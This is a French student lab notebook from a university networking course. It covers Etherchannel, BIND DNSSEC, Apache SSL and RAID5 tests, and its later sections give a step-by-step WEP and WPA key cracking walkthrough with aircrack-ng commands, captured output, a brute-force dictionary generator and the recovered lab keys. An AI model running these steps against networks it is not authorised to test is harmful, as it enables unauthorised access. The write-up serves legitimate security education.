Nous avons configuré une Etherchannel entre notre commutateur et notre routeur. Cela vise à remplacer la liaison trunk simple Gigabit qui les lie déjà, en une liaison 8gigabit. Nous remplacerons donc le port 4/48 par les ports 4/25 à 4/32.&lt;br /&gt;
&lt;br /&gt;
Voici la commande à rentrer dans l'interface de configuration du commutateur :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface range GigabitEthernet 4/25 - 32&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
 6 Switch-E304(config-if)#channel-protocol lacp&lt;br /&gt;
 7 Switch-E304(config-if)#channel-group 1 mode passive&lt;br /&gt;
 8 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 9 Switch-E304(config-if)#end&lt;br /&gt;
 10 Switch-E304#write memory (enregistrer la configuration)  &lt;br /&gt;
&lt;br /&gt;
Pareil dans l'interface de configuration du routeur, sauf que ce sera pour les ports 0/1 à 0/8, et que le channel-group sera en mode active.&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS et DNSSEC avec bind===&lt;br /&gt;
&lt;br /&gt;
La première étape consiste à modifier les informations de notre nom de domaine sur le site de Gandi.&lt;br /&gt;
Il faut alors se diriger sur la rubrique :''Gérer les Glue records''.&lt;br /&gt;
A partir de ce moment là, nous sommes libres de donner les informations suivantes à notre nom de domaine :&lt;br /&gt;
&lt;br /&gt;
'''nom du serveur''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''IP''' : 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
On peut ensuite modifier les serveurs de nom, toujours sur le site de Gandi, dans la rubrique ''modifier les serveurs DNS'' :&lt;br /&gt;
&lt;br /&gt;
'''DNS1''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''DNS2''' : ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier ''/etc/bind'' de notre machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
Nous modifions dans un premier temps le fichier ''named.conf.local'' afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;bielloumutherfucker.space&amp;quot; {&lt;br /&gt;
 type master;&lt;br /&gt;
 FIle &amp;quot;/etc/bind/zones/db.bielloumutherfucker.space&amp;quot;;&lt;br /&gt;
 allow-transfer {217.70.177.40; };&lt;br /&gt;
 notify yes;	&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
nous créons ensuite un dossier ''zones'' à l'intérieur duquel nous créons notre fichier de zone ''db.bielloumutherfucker.space'' :&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.bielloumutherfucker.space. root.bielloumutherfucker.space. (&lt;br /&gt;
                    2015102001         ; Serial&lt;br /&gt;
                         86400         ; Refresh&lt;br /&gt;
                          3600         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                         86400 )       ; Negative Cache TTL&lt;br /&gt;
 &lt;br /&gt;
 @       IN      NS      ns.bielloumutherfucker.space.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.167&lt;br /&gt;
 www     IN      A       193.48.57.167&lt;br /&gt;
 @	IN	A	193.48.57.167&lt;br /&gt;
&lt;br /&gt;
Il nous faut ensuite modifier notre fichier ''/etc/resolv.conf'' afin de passer par notre serveur :&lt;br /&gt;
&lt;br /&gt;
 search bielloumutherfucker.space&lt;br /&gt;
 nameserver 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, notre serveur DNS est opérationnel. Il nous faut maintenant le sécuriser grâce à DNSSEC.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il nous faut générer les clefs asymétriques KSK et ZSK. Nous entrons alors les commandes suivantes dans le terminal :&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -f KSK -b 2048 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef KSK&lt;br /&gt;
 dnssec-keygen -a RSASHA1 --b 1024 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef ZSK&lt;br /&gt;
&lt;br /&gt;
Nous avons maintenant 4 clefs : deux pour chaque type de clef (KSK ou ZSK) avec deux extention différentes (.key pour la clef publique, .private pour la privée).&lt;br /&gt;
&lt;br /&gt;
Après les avoir placé dans le répertoire ''bielloumutherfucker.space.dnssec'' que nous avons crée, on les renomme selon le schéma suivant :&lt;br /&gt;
&lt;br /&gt;
 bielloumutherfucker.space-ksk.key et bielloumutherfucker.space-ksk.private&lt;br /&gt;
 bielloumutherfucker.space-zsk.key et bielloumutherfucker.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant signer la zone à l'aide de la commande suivante (depuis le dossier /etc/bind) :&lt;br /&gt;
&lt;br /&gt;
 dnssec-signzone -o bielloumutherfucker.space -k bielloumutherfucker.space-ksk &lt;br /&gt;
 zones/db.bielloumutherfucker.space bielloumutherfucker.space-zsk&lt;br /&gt;
&lt;br /&gt;
Une nouvelle zone, signée, a donc été créée dans notre dossier ''zones''. Il ne nous reste plus qu'à modifier le fichier ''named.conf.local'' en rajoutant un ''.signed'' à la fin du champ File pour notre zone. Nous redémarrons ensuite le serveur bind.&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Nous retournons sur le site de gandi et dans la rubrique ''gérer DNSSEC'' nous ajoutons notre clef publique avec l'algorithme ''RSASHA1''. Une fois la clef ajoutée sur gandi, on peut voir que tous s'est bien passé en faisant un tour sur le site ''Zone Master'', l'attribut DNSSEC est en effet coché et vert.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:dnssec.png]]&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du site via certificat SSL===&lt;br /&gt;
&lt;br /&gt;
Il faut dans un premier temps générer la clefs CSR que nous donnerons à Gandi.&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout Ironman.key -out Ironman.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 ..................................................................+++&lt;br /&gt;
 .........................................+++&lt;br /&gt;
 writing new private key to 'Ironman.key'&lt;br /&gt;
 -----&lt;br /&gt;
 You are about to be asked to enter information that will be incorporated&lt;br /&gt;
 into your certificate request.&lt;br /&gt;
 What you are about to enter is what is called a Distinguished Name or a DN.&lt;br /&gt;
 There are quite a few fields but you can leave some blank&lt;br /&gt;
 For some fields there will be a default value,&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord &lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:bielloumutherfucker.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 Please enter the following 'extra' attributes&lt;br /&gt;
 to be sent with your certificate request&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, ls clefs ont été générées : &lt;br /&gt;
 &lt;br /&gt;
 root@Ironman:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
 Ironman.csr  Ironman.key&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Et nous pouvons donner la CSR à Gandhi afin d'activer la procédure d'activation.&lt;br /&gt;
&lt;br /&gt;
De façon à recevoir le mail sur admin@bielloumutherfucker.space, nous devons modifier le fichier /etc/aliases et y rajouter la ligne suivante:&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 admin: root&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat validé, il faut déplacer les clefs dans les dossiers suivants :&lt;br /&gt;
&lt;br /&gt;
 cp Ironman.key /etc/ssl/private/bielloumutherfucker.space.key&lt;br /&gt;
 cp certificate-380187.crt /etc/ssl/certs/bielloumutherfucker.space.crt&lt;br /&gt;
 cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem (clef intermédiaire)&lt;br /&gt;
&lt;br /&gt;
On effectue ensuite un rehash des certificats :&lt;br /&gt;
&lt;br /&gt;
 c_rehash /etc/ssl/certs&lt;br /&gt;
 Doing /etc/ssl/certs&lt;br /&gt;
 bielloumutherfucker.space.crt =&amp;gt; 6860aa7d.0&lt;br /&gt;
 bielloumutherfucker.space.crt =&amp;gt; 5692355e.0&lt;br /&gt;
 ssl-cert-snakeoil.pem =&amp;gt; a036afff.0&lt;br /&gt;
 ssl-cert-snakeoil.pem =&amp;gt; 4390636f.0&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; 8544bf03.0&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; e279a80b.0&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le fichier ''000-bielloumutherfucker.space-ssl.conf'' dans le dossier /etc/apache2/sites-available :&lt;br /&gt;
&lt;br /&gt;
 #NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.167:443&amp;gt;&lt;br /&gt;
                ServerName www.bielloumutherfucker.space&lt;br /&gt;
                ServerAlias bielloumutherfucker.space&lt;br /&gt;
                DocumentRoot /var/www/html/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/bielloumutherfucker.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/bielloumutherfucker.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/html&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
 ServerName &amp;quot;bielloumutherfucker.space&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Puis on modifie le fichier /etc/apache/ports.conf afin qu'apache écoute sur le port 443 (ssl) :&lt;br /&gt;
&lt;br /&gt;
 Listen 80 443&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On doit ensuite autoriser apache à utiliser son module ssl : &lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Puis on autorise notre site à utiliser ssl :&lt;br /&gt;
&lt;br /&gt;
 a2ensite 000-bielloumutherfucker.space-ssl.conf&lt;br /&gt;
&lt;br /&gt;
Ensuite :&lt;br /&gt;
&lt;br /&gt;
 service apache2 restart&lt;br /&gt;
 service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Maintenant, lorsqu'on se connecte sur notre site avec le préfixe &amp;quot;https://&amp;quot;, le site s'ouvre bien, et on aperçoit un cadenas vert certifiant que le site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ssl.png]]&lt;br /&gt;
&lt;br /&gt;
===Sécurisation des données===&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Thu Dec  8 16:52:21 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Thu Dec  8 16:52:21 2016&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : Ironman:0  (local to host Ironman)&lt;br /&gt;
           UUID : a82c02d3:4861fdcc:aa9f6f91:45e6f5d9&lt;br /&gt;
         Events : 0&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
fichier de test sur le raid 5 (iron-man.txt):&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:/datamd0# ls&lt;br /&gt;
 lost+found  test_ironman.txt&lt;br /&gt;
&lt;br /&gt;
première partion removed :&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Thu Dec  8 16:52:21 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Thu Dec  8 17:05:13 2016&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : Ironman:0  (local to host Ironman)&lt;br /&gt;
           UUID : a82c02d3:4861fdcc:aa9f6f91:45e6f5d9&lt;br /&gt;
         Events : 6&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
fichier toujours présent :&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# ls /datamd0/&lt;br /&gt;
 lost+found  test_ironman.txt&lt;br /&gt;
&lt;br /&gt;
On enlève la partition xvdf :&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# mdadm --set-faulty /dev/md0 /dev/xvdf&lt;br /&gt;
 [  196.176623] md/raid:md0: Disk failure on xvdf, disabling device.&lt;br /&gt;
 [  196.176623] md/raid:md0: Operation continuing on 1 devices.&lt;br /&gt;
 mdadm: set /dev/xvdf faulty in /dev/md0&lt;br /&gt;
 root@Ironman:~# mdadm --remove /dev/md0 /dev/xvdf&lt;br /&gt;
 [  229.573919] md: unbind&amp;lt;xvdf&amp;gt;&lt;br /&gt;
 [  229.573933] md: export_rdev(xvdf)&lt;br /&gt;
 mdadm: hot removed /dev/xvdf from /dev/md0&lt;br /&gt;
&lt;br /&gt;
===Crackage de clé WEP===&lt;br /&gt;
&lt;br /&gt;
Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP.&lt;br /&gt;
Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:CF:01:94  -74        0        0    0  -1  -1                    PolytechLille                                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -62        1        6    2   2  54e. WEP  WEP         cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -67        2        0    0   2  54e. WEP  WEP         cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -66        1        5    2   2  54e. WEP  WEP         cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -63        1       80   38   2  54e. WEP  WEP         cracotte03                                                  &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        0       24   11   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                                &lt;br /&gt;
 04:DA:D2:9C:50:55  -68        1       14    6   2  54e. WEP  WEP         cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -60        0       73   35   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:9C:50:51  -63        1       52   25   2  54e. WEP  WEP         cracotte02                                                 &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        1    0   3  54e. WEP  WEP40       Wolverine                                                  &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                            &lt;br /&gt;
                                                                                                                                      &lt;br /&gt;
 04:DA:D2:CF:01:94  00:0C:E7:91:C1:7D  -56    1e- 1e     0       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -68   54e-11e    15        5                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -72   36e- 5e     0        7                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -60   54e-48e    79       81                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:53  00:0F:B5:92:22:68  -64   48e-54e   111       24                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 -48e   128       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -62   54e-54e    92       75                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -60   48e-48e    63       53                                                                   &lt;br /&gt;
 (not associated)   9C:2A:83:45:F0:2D  -80    0 - 1      0        1                                                                   &lt;br /&gt;
 (not associated)   8A:1B:9C:B1:EC:8C  -70    0 - 1      5        2                                                                   &lt;br /&gt;
 44:AD:D9:5F:87:00  AC:5F:3E:59:90:D5  -40    0 - 1      0        2&lt;br /&gt;
&lt;br /&gt;
Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande :&lt;br /&gt;
 airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 8 s ][ 2016-03-31 20:30                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  -64   0       59      770   64   2  54e. WEP  WEP         cracotte06                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -68    6e-54e  5108      718 &lt;br /&gt;
&lt;br /&gt;
Une fois le fichier de capture créé, nous avons exécuter la commande &lt;br /&gt;
&lt;br /&gt;
 aircrack cracotte06-01.cap&lt;br /&gt;
&lt;br /&gt;
afin débuter le crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant en quelques minutes :&lt;br /&gt;
&lt;br /&gt;
                 [00:01:53] Tested 279622 keys (got 31535 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) &lt;br /&gt;
    1    0/  1   EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) &lt;br /&gt;
    2    0/  1   EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) &lt;br /&gt;
    3    0/  1   EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) &lt;br /&gt;
    4    0/  1   EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) &lt;br /&gt;
    5    0/  1   EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) &lt;br /&gt;
    6    0/  1   EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) &lt;br /&gt;
    7    0/  2   EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) &lt;br /&gt;
    8    0/  1   EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) &lt;br /&gt;
    9    0/  3   7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) &lt;br /&gt;
   10    0/  1   D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) &lt;br /&gt;
   11    1/  1   A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) &lt;br /&gt;
   12    0/  1   44(43740) 35(38548) A7(38252) 3A(37560) 88(37560) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
La clé a été trouver et sa valeur est &amp;quot;EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44&amp;quot;&lt;br /&gt;
&lt;br /&gt;
===Craquage de clé WPA===&lt;br /&gt;
&lt;br /&gt;
Le craquage d'une clé WPA est beaucoup plus long que celui d'une clé WEP car le crack doit effectuer un test sur tout les nombres à 8 chiffres jusqu'à arriver au mot de passe de la borne Wifi. C'est un crack en force brute.&lt;br /&gt;
&lt;br /&gt;
Nous avons donc tout d'abord génerer un fichier texte contenant tout les nombres à 8 chiffres (de 00000000 à 99999999) grâce au petit programme c suivant :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #define MAX_NUM 99999999&lt;br /&gt;
&lt;br /&gt;
 int main(){&lt;br /&gt;
 long chiffre = 0;&lt;br /&gt;
 FILE* fp = NULL;&lt;br /&gt;
 fp = fopen(&amp;quot;dictionnaire.txt&amp;quot;,&amp;quot;a+&amp;quot;);&lt;br /&gt;
 	if (fp != NULL){&lt;br /&gt;
 		for (chiffre=0;chiffre&amp;lt; MAX_NUM + 1;chiffre++)&lt;br /&gt;
 		{&lt;br /&gt;
 		fprintf(fp,&amp;quot;%08li\n&amp;quot;,chiffre);&lt;br /&gt;
 		}&lt;br /&gt;
 	fclose(fp);&lt;br /&gt;
 	}&lt;br /&gt;
 return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Une fois le dictionnaire généré, on effectue la même commande qu'avec le crackage WEP mais pour les clés WPA : &lt;br /&gt;
&lt;br /&gt;
1. On bascule l'interface wifi en mode monitor :&lt;br /&gt;
 airmon-ng start wlan2&lt;br /&gt;
&lt;br /&gt;
2. On fait un airodump-ng de tout les réseaux possédant un chiffrage WPA :&lt;br /&gt;
 airodump-ng --encrypt WPA wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant :&lt;br /&gt;
&lt;br /&gt;
 00:19:07:C5:0F:A4  -44        7        8    2   1  54e. WPA2 CCMP   MGT  PolytechLille                                              &lt;br /&gt;
 00:19:07:C5:0F:A2  -48        5        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A5  -48        6        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A3  -50        7        0    0   1  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 00:19:07:C5:0F:A1  -50        7        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A7  -52        6        0    0   1  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 00:19:07:C5:0F:A6  -52        5        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A0  -54        6        2    0   1  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 00:19:07:C5:0F:A8  -55        5        5    0   1  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:9C:50:53  -62        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte04                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte03                                                 &lt;br /&gt;
 04:DA:D2:9C:50:58  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte09                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -66        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte01                                                 &lt;br /&gt;
 04:DA:D2:9C:50:55  -65        6        0    0  13  54e. WPA2 CCMP   PSK  cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -65        3        0    0  13  54e. WPA2 CCMP   PSK  cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:59  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte10                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:57  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:51  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte02                                                 &lt;br /&gt;
 04:DA:D2:CF:01:91  -69        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 C8:00:84:84:00:53  -70        3        0    0   9  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 C8:00:84:84:00:52  -71        4        0    0   9  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:98  -70        2        0    0   5  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:CF:01:90  -71        3        0    0   5  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 04:DA:D2:CF:01:95  -72        2        0    0   5  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:97  -72        2        0    0   5  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 04:DA:D2:CF:01:96  -72        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. Nous décidons de cracker cracotte09, on lance un airodump sur son essid et on effectue une capture &lt;br /&gt;
 &lt;br /&gt;
 airodump-ng -w cracotte09 --encrypt wpa -c 13 -essid cracotte09 wlan05&lt;br /&gt;
&lt;br /&gt;
4. On lance le aircrack avec le fichier de capture et notre dictionnaire généré précédemment :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w dictionnaire.txt cracotte09-01.cap&lt;br /&gt;
&lt;br /&gt;
5. Au bout de 57:55 minutes, nous avons obtenu la clé suivante :&lt;br /&gt;
&lt;br /&gt;
passphrase : 12399909&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35772</id>
		<title>Cahier 2016 groupe n°7</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35772"/>
				<updated>2016-12-08T14:40:21Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Sécurisation des données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
&lt;br /&gt;
Mise en réseau des commutateurs 6006 en E304&lt;br /&gt;
&lt;br /&gt;
==Avancement du travail==&lt;br /&gt;
&lt;br /&gt;
===Configuration du 6006===&lt;br /&gt;
&lt;br /&gt;
-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10 &lt;br /&gt;
&lt;br /&gt;
-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11&lt;br /&gt;
&lt;br /&gt;
-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.&lt;br /&gt;
&lt;br /&gt;
